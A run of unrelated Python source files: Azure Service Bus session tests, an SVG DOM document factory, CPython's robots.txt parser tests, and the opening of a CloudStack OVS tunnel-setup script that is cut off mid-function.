sb_client.get_queue_sender(servicebus_queue.name) as sender: sender.send_messages(ServiceBusMessage("test_message", session_id=session_id)) failures = 0 def should_not_run(*args, **kwargs): failures += 1 auto_lock_renewer = AutoLockRenewer(on_lock_renew_failure=should_not_run) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE, auto_lock_renewer=auto_lock_renewer) as receiver: assert receiver.receive_messages() assert not failures @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer() @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_message_connection_closed(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: message = ServiceBusMessage("test") message.session_id = session_id sender.send_messages(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: messages = receiver.receive_messages(max_wait_time=10) assert len(messages) == 1 with pytest.raises(ValueError): receiver.complete_message(messages[0]) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer() @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True, lock_duration='PT5S') def test_session_message_expiry(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with 
sb_client.get_queue_sender(servicebus_queue.name) as sender: message = ServiceBusMessage("Testing expired messages") message.session_id = session_id sender.send_messages(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: messages = receiver.receive_messages(max_wait_time=10) assert len(messages) == 1 print_message(_logger, messages[0]) time.sleep(10) with pytest.raises(TypeError): messages[0]._lock_expired with pytest.raises(TypeError): receiver.renew_message_lock(messages[0]) #TODO: Bug: Why was this 30s sleep before? compare with T1. assert receiver.session._lock_expired with pytest.raises(SessionLockLostError): receiver.complete_message(messages[0]) with pytest.raises(SessionLockLostError): receiver.session.renew_lock() with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: messages = receiver.receive_messages(max_wait_time=30) assert len(messages) == 1 print_message(_logger, messages[0]) assert messages[0].delivery_count receiver.complete_message(messages[0]) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_schedule_message(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) enqueue_time = (utc_now() + timedelta(minutes=2)).replace(microsecond=0) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: with sb_client.get_queue_sender(servicebus_queue.name) as sender: content = str(uuid.uuid4()) message_id = uuid.uuid4() message = ServiceBusMessage(content, session_id=session_id) message.message_id = message_id message.scheduled_enqueue_time_utc = enqueue_time sender.send_messages(message) messages = [] count = 0 while not messages and count < 12: messages = receiver.receive_messages(max_wait_time=10) receiver.session.renew_lock(timeout=None) count += 1 data = str(messages[0]) assert data == content assert messages[0].message_id == message_id assert messages[0].scheduled_enqueue_time_utc == enqueue_time assert messages[0].scheduled_enqueue_time_utc == messages[0].enqueued_time_utc.replace(microsecond=0) assert len(messages) == 1 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_schedule_multiple_messages(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) enqueue_time = (utc_now() + timedelta(minutes=2)).replace(microsecond=0) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, prefetch_count=20) as receiver: with sb_client.get_queue_sender(servicebus_queue.name) as sender: content = str(uuid.uuid4()) message_id_a = uuid.uuid4() message_a = ServiceBusMessage(content, session_id=session_id) message_a.message_id = message_id_a message_id_b = uuid.uuid4() message_b = ServiceBusMessage(content, session_id=session_id) message_b.message_id = message_id_b tokens = 
sender.schedule_messages([message_a, message_b], enqueue_time) assert len(tokens) == 2 messages = [] count = 0 while len(messages) < 2 and count < 12: receiver.session.renew_lock(timeout=None) messages.extend(receiver.receive_messages(max_wait_time=15)) time.sleep(5) count += 1 data = str(messages[0]) assert data == content assert messages[0].message_id in (message_id_a, message_id_b) assert messages[0].scheduled_enqueue_time_utc == enqueue_time assert messages[0].scheduled_enqueue_time_utc == messages[0].enqueued_time_utc.replace(microsecond=0) assert len(messages) == 2 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_cancel_scheduled_messages(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) enqueue_time = (utc_now() + timedelta(minutes=2)).replace(microsecond=0) with sb_client.get_queue_sender(servicebus_queue.name) as sender: message_a = ServiceBusMessage("Test scheduled message", session_id=session_id) message_b = ServiceBusMessage("Test scheduled message", session_id=session_id) tokens = sender.schedule_messages([message_a, message_b], enqueue_time) assert len(tokens) == 2 sender.cancel_scheduled_messages(tokens) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: messages = [] count = 0 while not messages and count < 13: messages = receiver.receive_messages(max_wait_time=20) receiver.session.renew_lock() count += 1 assert len(messages) == 0 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_get_set_state_with_receiver(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(3): message = ServiceBusMessage("Handler message no. 
{}".format(i), session_id=session_id) sender.send_messages(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as session: assert session.session.get_state(timeout=5) == None session.session.set_state("first_state", timeout=5) count = 0 for m in session: assert m.session_id == session_id count += 1 state = session.session.get_state() assert state == b'first_state' assert count == 3 @pytest.mark.skip(reason="Needs list sessions") @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_list_sessions_with_receiver(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: sessions = [] start_time = utc_now() for i in range(5): sessions.append(str(uuid.uuid4())) for session_id in sessions: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(5): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id) sender.send_messages(message) for session_id in sessions: with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: receiver.set_state("SESSION {}".format(session_id)) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=NEXT_AVAILABLE_SESSION, max_wait_time=5, receive_mode=ServiceBusReceiveMode.PEEK_LOCK) as receiver: current_sessions = receiver.list_sessions(updated_since=start_time) assert len(current_sessions) == 5 assert current_sessions == sessions @pytest.mark.skip("Requires list sessions") @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_list_sessions_with_client(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: sessions = [] start_time = utc_now() for i in range(5): sessions.append(str(uuid.uuid4())) for session in sessions: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(5): message = ServiceBusMessage("Test message no. 
{}".format(i), session_id=session) sender.send_messages(message) for session in sessions: with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session) as receiver: receiver.set_state("SESSION {}".format(session)) current_sessions = receiver.list_sessions(updated_since=start_time) assert len(current_sessions) == 5 assert current_sessions == sessions @pytest.mark.liveTest @pytest.mark.live_test_only @pytest.mark.xfail(reason="'Cannot open log' error, potential service bug", raises=ServiceBusError) @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_session_pool(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): messages = [] errors = [] concurrent_receivers = 5 def message_processing(sb_client): while True: try: with sb_client.get_queue_receiver(servicebus_queue.name, session_id=NEXT_AVAILABLE_SESSION, max_wait_time=10) as receiver: for message in receiver: print("ServiceBusReceivedMessage: {}".format(message)) messages.append(message) receiver.complete_message(message) except OperationTimeoutError: return except Exception as e: errors.append(e) raise with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: sessions = [str(uuid.uuid4()) for i in range(concurrent_receivers)] for session_id in sessions: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(20): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id) sender.send_messages(message) futures = [] with concurrent.futures.ThreadPoolExecutor(max_workers=concurrent_receivers) as thread_pool: for _ in range(concurrent_receivers): futures.append(thread_pool.submit(message_processing, sb_client)) concurrent.futures.wait(futures) assert not errors assert len(messages) == 100 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_session_client_conn_str_receive_handler_peeklock_abandon(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(3): message = ServiceBusMessage("Handler message no. {}".format(i), session_id=session_id) sender.send_messages(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, prefetch_count=0, max_wait_time=5) as receiver: message = receiver.next() assert message.sequence_number == 1 receiver.abandon_message(message) for next_message in receiver: # we can't be sure there won't be a service delay, so we may not get the message back _immediately_, even if in most cases it shows right back up. 
if not next_message: raise Exception("Did not successfully re-receive abandoned message, sequence_number 1 was not observed.") if next_message.sequence_number == 1: return @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusTopicPreparer(name_prefix='servicebustest') @ServiceBusSubscriptionPreparer(name_prefix='servicebustest', requires_session=True) def test_session_basic_topic_subscription_send_and_receive(self, servicebus_namespace_connection_string, servicebus_topic, servicebus_subscription, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False ) as sb_client: with sb_client.get_topic_sender(topic_name=servicebus_topic.name) as sender: message = ServiceBusMessage(b"Sample topic message", session_id='test_session') sender.send_messages(message) with sb_client.get_subscription_receiver( topic_name=servicebus_topic.name, subscription_name=servicebus_subscription.name, session_id='test_session', max_wait_time=5 ) as receiver: count = 0 for message in receiver: count += 1 receiver.complete_message(message) assert count == 1 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @CachedServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_non_session_send_to_session_queue_should_fail(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: message = ServiceBusMessage("This should be an invalid non session message") with pytest.raises(ServiceBusError): sender.send_messages(message)
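# Illustrative sketch only (not one of the tests above): the basic session
# send/receive round trip that this suite exercises, written against the same
# azure-servicebus client API used throughout. SERVICE_BUS_CONN_STR and
# QUEUE_NAME are placeholder settings, assumed to point at a session-enabled queue.
import os
import uuid

from azure.servicebus import ServiceBusClient, ServiceBusMessage


def _session_round_trip_example():
    conn_str = os.environ["SERVICE_BUS_CONN_STR"]   # placeholder setting
    queue_name = os.environ["QUEUE_NAME"]           # placeholder setting
    session_id = str(uuid.uuid4())
    with ServiceBusClient.from_connection_string(conn_str) as client:
        # Session messages are ordinary messages stamped with a session_id.
        with client.get_queue_sender(queue_name) as sender:
            sender.send_messages(ServiceBusMessage("hello", session_id=session_id))
        # A session receiver is locked to exactly one session_id.
        with client.get_queue_receiver(queue_name, session_id=session_id,
                                       max_wait_time=5) as receiver:
            for message in receiver:
                receiver.complete_message(message)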
from xml.dom.minidom import DOMImplementation from xml.dom.minidom import Document from RGT.XML.SVG.svgNode import SvgNode from RGT.XML.SVG.gNode import GNode from RGT.XML.SVG.defsNode import DefsNode from RGT.XML.SVG.descNode import DescNode from RGT.XML.SVG.titleNode import TitleNode from RGT.XML.SVG.symbolNode import SymbolNode from RGT.XML.SVG.imageNode import ImageNode from RGT.XML.SVG.useNode import UseNode from RGT.XML.SVG.switchNode import SwitchNode from RGT.XML.SVG.styleNode import StyleNode from RGT.XML.SVG.pathNode import PathNode from RGT.XML.SVG.rectNode import RectNode from RGT.XML.SVG.circleNode import CircleNode from RGT.XML.SVG.ellipseNode import EllipseNode from RGT.XML.SVG.lineNode import LineNode from RGT.XML.SVG.polylineNode import PolylineNode from RGT.XML.SVG.polygonNode import PolygonNode from RGT.XML.SVG.textNode import TextNode from RGT.XML.SVG.tspanNode import TspanNode from RGT.XML.SVG.trefNode import TrefNode from RGT.XML.SVG.textPathNode import TextPathNode from RGT.XML.SVG.altGlyphNode import AltGlyphNode from RGT.XML.SVG.altGlyDefNode import AltGlyphDefNode from RGT.XML.SVG.altGlyphItemNode import AltGlyphItemNode from RGT.XML.SVG.glyphRefNode import GlyphRefNode from RGT.XML.SVG.markerNode import MarkerNode from RGT.XML.SVG.colorProfileNode import ColorProfileNode from RGT.XML.SVG.clipPathNode import ClipPathNode from RGT.XML.SVG.maskNode import MaskNode from RGT.XML.SVG.filterNode import FilterNode #filters from RGT.XML.SVG.Filters.feDistantLightNode import FeDistantLightNode from RGT.XML.SVG.Filters.fePointLightNode import FePointLightNode from RGT.XML.SVG.Filters.feSpotLightNode import FeSpotLightNode from RGT.XML.SVG.Filters.feBlendNode import FeBlendNode from RGT.XML.SVG.Filters.feColorMatrixNode import FeColorMatrixNode from RGT.XML.SVG.Filters.feComponentTransferNode import FeComponentTransferNode from RGT.XML.SVG.Filters.feFuncRNode import FeFuncRNode from RGT.XML.SVG.Filters.feFuncGNode import FeFuncGNode from RGT.XML.SVG.Filters.feFuncANode import FeFuncANode from RGT.XML.SVG.Filters.feFuncBNode import FeFuncBNode from RGT.XML.SVG.Filters.feCompositeNode import FeCompositeNode from RGT.XML.SVG.Filters.feConvolveMatrixNode import FeConvolveMatrixNode from RGT.XML.SVG.Filters.feDiffuseLightingNode import FeDiffuseLightingNode from RGT.XML.SVG.Filters.feDisplacementMapNode import FeDisplacementMapNode from RGT.XML.SVG.Filters.feFloodNode import FeFloodNode from RGT.XML.SVG.Filters.feGaussianBlurNode import FeGaussianBlurNode from RGT.XML.SVG.Filters.feImageNode import FeImageNode from RGT.XML.SVG.Filters.feMergeNode import FeMergeNode from RGT.XML.SVG.Filters.feMergeNodeNode import FeMergeNodeNode from RGT.XML.SVG.Filters.feMorphologyNode import FeMorphologyNode from RGT.XML.SVG.Filters.feOffsetNode import FeOffsetNode from RGT.XML.SVG.Filters.feSpecularLightingNode import FeSpecularLightingNode from RGT.XML.SVG.Filters.feTileNode import FeTileNode from RGT.XML.SVG.Filters.feTurbulenceNode import FeTurbulenceNode #finish filters from RGT.XML.SVG.cursorNode import CursorNode from RGT.XML.SVG.aNode import ANode from RGT.XML.SVG.viewNode import ViewNode from RGT.XML.SVG.scriptNode import ScriptNode #animate from RGT.XML.SVG.Animation.animateNode import AnimateNode from RGT.XML.SVG.Animation.setNode import SetNode from RGT.XML.SVG.Animation.animateMotionNode import AnimateMotionNode from RGT.XML.SVG.Animation.mpathNode import MpathNode from RGT.XML.SVG.Animation.animateColorNode import AnimateColorNode from RGT.XML.SVG.Animation.animateTransformNode 
import AnimateTransformNode #end animate #font from RGT.XML.SVG.fontNode import FontNode from RGT.XML.SVG.glyphNode import GlyphNode from RGT.XML.SVG.missingGlyphNode import MissingGlyph from RGT.XML.SVG.hkernNode import HkernNode from RGT.XML.SVG.vkernNode import VkernNode from RGT.XML.SVG.fontFaceNode import FontFaceNode from RGT.XML.SVG.fontFaceSrcNode import FontFaceSrcNode from RGT.XML.SVG.fontFaceUriNode import FontFaceUriNode from RGT.XML.SVG.fontFaceFormatNode import FontFaceFormatNode from RGT.XML.SVG.fontFaceNameNode import FontFaceNameNode #end font from RGT.XML.SVG.metadataNode import MetadataNode from RGT.XML.SVG.foreignObjectNode import ForeignObjectNode #gradient from RGT.XML.SVG.linearGradientNode import LinearGradientNode from RGT.XML.SVG.radialGradientNode import RadialGradientNode #end gradient from RGT.XML.SVG.patternNode import PatternNode from RGT.XML.SVG.stopNode import StopNode #class copied from minidom class SvgDOMImplementation(DOMImplementation): def createSvgDocument(self): #namespaceURI= None doctype = None #qualifiedName= 'svg' doc = SvgDocument() element = doc.createSvgNode() doc.appendChild(element) doc.doctype = doctype doc.implementation = self return doc #class copied from minidom class SvgDocument(Document): implementation = SvgDOMImplementation def __init__(self): Document.__init__(self) def createSvgNode(self): return SvgNode(self) def createGNode(self): return GNode(self) def createDefsNode(self): return DefsNode(self) def createDescNode(self): return DescNode(self) def createTitleNode(self): return TitleNode(self) def createSymbolNode(self): return SymbolNode(self) def createUseNode(self): return UseNode(self) def createImageNode(self): return ImageNode(self) def createSwitchNode(self): return SwitchNode(self) def createStyleNode(self): return StyleNode(self) def createPathNode(self): return PathNode(self) def createRectNode(self, x=None, y=None, height=None, width=None): return RectNode(self, x, y, height, width) def createCircleNode(self, cx=None, cy=None, r=None): return CircleNode(self, cx, cy, r) def createEllipseNode(self, rx=None, ry=None): return EllipseNode(self, rx, ry) def createLineNode(self, x1=None, y1=None, x2=None, y2=None): lineNode = LineNode(self, x1, y1, x2, y2) return lineNode def createPolylineNode(self, points=None): return PolylineNode(self, points) def createPolygonNode(self, points=None): return PolygonNode(self, points) def createSvgTextNode(self, x=None, y=None, text=None): return TextNode(self, x, y, text) def createTspanNode(self, x=None, y=None): return TspanNode(self, x, y) def createTrefNode(self): return TrefNode(self) def createTextPathNode(self): return TextPathNode(self) def createAltGlyphNode(self): return AltGlyphNode(self) def createAltGlyphDefNode(self): return AltGlyphDefNode(self) def createAltGlyphItemNode(self): return AltGlyphItemNode(self) def createGlyphRefNode(self): return GlyphRefNode(self) def createMarkerNode(self): return MarkerNode(self) def createColorProfileNode(self): return ColorProfileNode(self) def createClipPathNode(self): return ClipPathNode(self) def createMaskNode(self): return MaskNode(self) def createFilterNode(self): return FilterNode(self) #filters def createFeDistantLightNode(self, azimuth=None, elevation=None): return FeDistantLightNode(self, azimuth, elevation) def createFePointLightNode(self, x=None, y=None, z=None): return FePointLightNode(self, x, y, z) def createFeSpotLightNode(self, x=None, y=None, z=None, specularExponent=None, limitingConeAngle=None): return 
FeSpotLightNode(self, x, y, z, specularExponent, limitingConeAngle) def createFeBlendNode(self): return FeBlendNode(self) def createFeColorMatrixNode(self): return FeColorMatrixNode(self) def createFeComponentTransferNode(self): return FeComponentTransferNode(self) def createFeFuncRNode(self): return FeFuncRNode(self) def createFeFuncGNode(self): return FeFuncGNode(self) def createFeFuncA(self): return FeFuncANode(self) def createFeFuncB(self): return FeFuncBNode(self) def createFeCompositeNode(self): return FeCompositeNode(self) def createrFeConvolveMatrixNode(self): return FeConvolveMatrixNode(self) def createFeDiffuseLightingNode(self): return FeDiffuseLightingNode(self) def createFeDisplacementMapNode(self): return FeDisplacementMapNode(self) def createFeFloodNode(self): return FeFloodNode(self) def createFeGaussianBlurNode(self): return FeGaussianBlurNode(self) def createFeImageNode(self): return FeImageNode(self) def createFeMergeNode(self): return FeMergeNode(self) def createFeMergeNodeNode(self): return FeMergeNodeNode(self) def createFeMorphologyNode(self): return FeMorphologyNode(self) def createFeOffsetNode(self): return FeOffsetNode(self) def createFeSpecularLightingNode(self): return FeSpecularLightingNode(self) def createFeTileNode(self): return FeTileNode(self) def createFeTurbulenceNode(self): return FeTurbulenceNode(self) #end filters def createCursorNode(self, x=None, y=None): return CursorNode(self, x, y) def createANode(self): return ANode(self) def createViewNode(self): return ViewNode(self) def createScriptNode(self): return ScriptNode(self) #animate def createAnimateNode(self): return AnimateNode(self) def createSetNode(self): return SetNode(self) def createAnimateMotionNode(self): return AnimateMotionNode(self) def createMPathNode(self): return MpathNode(self) def createAnimateColorNode(self): return AnimateColorNode(self) def createAnimateTransformNode(self): return AnimateTransformNode(self) #end animate #font def createFontNode(self): return FontNode(self) def createGlypthNode(self): return GlyphNode(self) def createMissingGlypthNode(self): return MissingGlyph(self) def createHkernNode(self): return HkernNode(self) def createVkernNode(self): return VkernNode(self) def createFontFaceNode(self): return FontFaceNode(self) def createFontFaceSrcNode(self): return FontFaceSrcNode(self) def createFontFaceUriNode(self): return FontFaceUriNode(self) def createFontFaceFormatNode(self): return FontFaceFormatNode(self) def createFontFaceNameNode(self): return FontFaceNameNode(self) #end font def createMetadataNode(self): return MetadataNode(self) def createForeignObjectNode(self): return ForeignObjectNode(self) #gradient def createLinearGradientNode(self, x1=None, y1=None, x2=None, y2=None): return LinearGradientNode(self, x1, y1, x2, y2) def createRadialGradientNode(self): return RadialGradientNode(self) #end gradient def createGlyphNode(self): return GlyphNode(self) def createPatternNode(self): return PatternNode(self) def createStopNode(self, offset=None, stopColor=None, stopOpacity=None, style=None): return StopNode(self, offset, stopColor, stopOpacity, style) #copy from minidom, removed the part that writes the <?xml version="1.0" ?> and the encoding def writexml(self, writer, indent="", addindent="", newl="", encoding=None): for node in self.childNodes: node.writexml(writer, indent, addindent, newl)
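# Minimal usage sketch (not part of the module above), assuming the RGT.XML.SVG
# package is importable: build a document with SvgDOMImplementation, attach a
# rect, and serialize it through the writexml() override defined above. The
# attribute values passed to createRectNode() are illustrative only.
import io


def _svg_document_example():
    impl = SvgDOMImplementation()
    doc = impl.createSvgDocument()            # creates and appends the <svg> root
    rect = doc.createRectNode(x='10', y='10', height='50', width='100')
    doc.documentElement.appendChild(rect)     # documentElement is the <svg> root
    out = io.StringIO()
    doc.writexml(out, addindent='    ', newl='\n')
    return out.getvalue()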
import io import unittest import urllib.robotparser from urllib.error import URLError, HTTPError from urllib.request import urlopen from test import support class RobotTestCase(unittest.TestCase): def __init__(self, index, parser, url, good, agent): unittest.TestCase.__init__(self) if good: self.str = "RobotTest(%d, good, %s)" % (index, url) else: self.str = "RobotTest(%d, bad, %s)" % (index, url) self.parser = parser self.url = url self.good = good self.agent = agent def runTest(self): if isinstance(self.url, tuple): agent, url = self.url else: url = self.url agent = self.agent if self.good: self.assertTrue(self.parser.can_fetch(agent, url)) else: self.assertFalse(self.parser.can_fetch(agent, url)) def __str__(self): return self.str tests = unittest.TestSuite() def RobotTest(index, robots_txt, good_urls, bad_urls, agent="test_robotparser"): lines = io.StringIO(robots_txt).readlines() parser = urllib.robotparser.RobotFileParser() parser.parse(lines) for url in good_urls: tests.addTest(RobotTestCase(index, parser, url, 1, agent)) for url in bad_urls: tests.addTest(RobotTestCase(index, parser, url, 0, agent)) # Examples from http://www.robotstxt.org/wc/norobots.html (fetched 2002) # 1. doc = """ User-agent: * Disallow: /cyberworld/map/ # This is an infinite virtual URL space Disallow: /tmp/ # these will soon disappear Disallow: /foo.html """ good = ['/','/test.html'] bad = ['/cyberworld/map/index.html','/tmp/xxx','/foo.html'] RobotTest(1, doc, good, bad) # 2. doc = """ # robots.txt for http://www.example.com/ User-agent: * Disallow: /cyberworld/map/ # This is an infinite virtual URL space # Cybermapper knows where to go. User-agent: cybermapper Disallow: """ good = ['/','/test.html',('cybermapper','/cyberworld/map/index.html')] bad = ['/cyberworld/map/index.html'] RobotTest(2, doc, good, bad) # 3. doc = """ # go away User-agent: * Disallow: / """ good = [] bad = ['/cyberworld/map/index.html','/','/tmp/'] RobotTest(3, doc, good, bad) # Examples from http://www.robotstxt.org/wc/norobots-rfc.html (fetched 2002) # 4. doc = """ User-agent: figtree Disallow: /tmp Disallow: /a%3cd.html Disallow: /a%2fb.html Disallow: /%7ejoe/index.html """ good = [] # XFAIL '/a/b.html' bad = ['/tmp','/tmp.html','/tmp/a.html', '/a%3cd.html','/a%3Cd.html','/a%2fb.html', '/~joe/index.html' ] RobotTest(4, doc, good, bad, 'figtree') RobotTest(5, doc, good, bad, 'FigTree Robot libwww-perl/5.04') # 6. doc = """ User-agent: * Disallow: /tmp/ Disallow: /a%3Cd.html Disallow: /a/b.html Disallow: /%7ejoe/index.html """ good = ['/tmp',] # XFAIL: '/a%2fb.html' bad = ['/tmp/','/tmp/a.html', '/a%3cd.html','/a%3Cd.html',"/a/b.html", '/%7Ejoe/index.html'] RobotTest(6, doc, good, bad) # From bug report #523041 # 7. doc = """ User-Agent: * Disallow: /. """ good = ['/foo.html'] bad = [] # Bug report says "/" should be denied, but that is not in the RFC RobotTest(7, doc, good, bad) # From Google: http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=40364 # 8. doc = """ User-agent: Googlebot Allow: /folder1/myfile.html Disallow: /folder1/ """ good = ['/folder1/myfile.html'] bad = ['/folder1/anotherfile.html'] RobotTest(8, doc, good, bad, agent="Googlebot") # 9. This file is incorrect because "Googlebot" is a substring of # "Googlebot-Mobile", so test 10 works just like test 9. 
doc = """ User-agent: Googlebot Disallow: / User-agent: Googlebot-Mobile Allow: / """ good = [] bad = ['/something.jpg'] RobotTest(9, doc, good, bad, agent="Googlebot") good = [] bad = ['/something.jpg'] RobotTest(10, doc, good, bad, agent="Googlebot-Mobile") # 11. Get the order correct. doc = """ User-agent: Googlebot-Mobile Allow: / User-agent: Googlebot Disallow: / """ good = [] bad = ['/something.jpg'] RobotTest(11, doc, good, bad, agent="Googlebot") good = ['/something.jpg'] bad = [] RobotTest(12, doc, good, bad, agent="Googlebot-Mobile") # 13. Google also got the order wrong in #8. You need to specify the # URLs from more specific to more general. doc = """ User-agent: Googlebot Allow: /folder1/myfile.html Disallow: /folder1/ """ good = ['/folder1/myfile.html'] bad = ['/folder1/anotherfile.html'] RobotTest(13, doc, good, bad, agent="googlebot") # 14. For issue #6325 (query string support) doc = """ User-agent: * Disallow: /some/path?name=value """ good = ['/some/path'] bad = ['/some/path?name=value'] RobotTest(14, doc, good, bad) # 15. For issue #4108 (obey first * entry) doc = """ User-agent: * Disallow: /some/path User-agent: * Disallow: /another/path """ good = ['/another/path'] bad = ['/some/path'] RobotTest(15, doc, good, bad) class NetworkTestCase(unittest.TestCase): def testPasswordProtectedSite(self): support.requires('network') with support.transient_internet('mueblesmoraleda.com'): url = 'http://mueblesmoraleda.com' robots_url = url + "/robots.txt" # First check the URL is usable for our purposes, since the # test site is a bit flaky. try: urlopen(robots_url) except HTTPError as e: if e.code not in {401, 403}: self.skipTest( "%r should return a 401 or 403 HTTP error, not %r" % (robots_url, e.code)) else: self.skipTest( "%r should return a 401 or 403 HTTP error, not succeed" % (robots_url)) parser = urllib.robotparser.RobotFileParser() parser.set_url(url) try: parser.read() except URLError: self.skipTest('%s is unavailable' % url) self.assertEqual(parser.can_fetch("*", robots_url), False) def testPythonOrg(self): support.requires('network') with support.transient_internet('www.python.org'): parser = urllib.robotparser.RobotFileParser( "http://www.python.org/robots.txt") parser.read() self.assertTrue( parser.can_fetch("*", "http://www.python.org/robots.txt")) def test_main(): support.run_unittest(NetworkTestCase) support.run_unittest(tests) if __name__=='__main__': support.verbose = 1 test_main()
#!/usr/bin/python # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # Creates a tunnel mesh across xenserver hosts # Enforces broadcast drop rules on ingress GRE tunnels import cloudstack_pluginlib as lib import logging import commands import os import sys import subprocess import time import json from optparse import OptionParser, OptionGroup, OptParseError, BadOptionError, OptionError, OptionConflictError, OptionValueError from time import localtime as _localtime, asctime as _asctime def setup_ovs_bridge(bridge, key, cs_host_id): res = lib.check_switch() if res != "SUCCESS": #return "FAILURE:%s" % res return 